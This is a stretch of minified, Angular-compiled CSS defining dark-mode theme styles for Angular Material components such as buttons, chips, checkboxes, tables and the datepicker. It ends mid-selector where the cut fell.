.mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-icon-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{opacity:.1;background-color:currentColor}.darkMode[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background:white}.darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]:not(.mat-button-disabled){border-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-flat-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab[_ngcontent-%COMP%]{color:#fff;background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-flat-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-stroked-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-flat-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-raised-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-raised-button[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-raised-button.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-mini-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-mini-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-mini-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-standalone[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:none}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#fff;background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard.mat-button-toggle-vertical[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:none;border-top:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#212121;color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-checked.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-disabled[_ngcontent-%COMP%]{color:#ffffff4d;background-color:#000}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-disabled.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-disabled.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%]   .mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]{border:solid 1px #595959}.darkMode[_ngcontent-%COMP%]   .mat-card[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-card[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-card.mat-card-flat[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-card-subtitle[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checkmark[_ngcontent-%COMP%]{fill:#303030}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checkmark-path[_ngcontent-%COMP%]{stroke:#303030!important}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-mixedmark[_ngcontent-%COMP%]{background-color:#303030}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-indeterminate.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-indeterminate.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-indeterminate.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled.mat-checkbox-checked[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled.mat-checkbox-indeterminate[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#686868}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled[_ngcontent-%COMP%]:not(.mat-checkbox-checked)   .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#686868}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-disabled[_ngcontent-%COMP%]   .mat-checkbox-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%]{background:#2196f3}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%]{background:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%]{background:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]{background-color:#616161;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled):active{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled)   .mat-chip-remove[_ngcontent-%COMP%]:hover{opacity:.54}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-disabled[_ngcontent-%COMP%]{opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:after{background:white}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]   thead[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]   tbody[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-table[_ngcontent-%COMP%]   tfoot[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-header-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-footer-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [mat-header-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [mat-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   [mat-footer-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-table-sticky[_ngcontent-%COMP%]{background:inherit}.darkMode[_ngcontent-%COMP%]   mat-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-header-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   mat-footer-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   th.mat-header-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   td.mat-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   td.mat-footer-cell[_ngcontent-%COMP%]{border-bottom-color:#ffffff1f}.darkMode[_ngcontent-%COMP%]   .mat-header-cell[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-footer-cell[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-calendar-arrow[_ngcontent-%COMP%]{fill:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-toggle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-next-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-previous-button[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-calendar-table-header-divider[_ngcontent-%COMP%]:after{background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-table-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-label[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-cell-content[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#fff;border-color:transparent}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-form-field-disabled[_ngcontent-%COMP%]   .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-preview[_ngcontent-%COMP%]{color:#ffffff3d}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#ffffff80}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(33,150,243,.2)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f366}.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}@media (hover: hover){.darkMode[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#424242;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(123,31,162,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   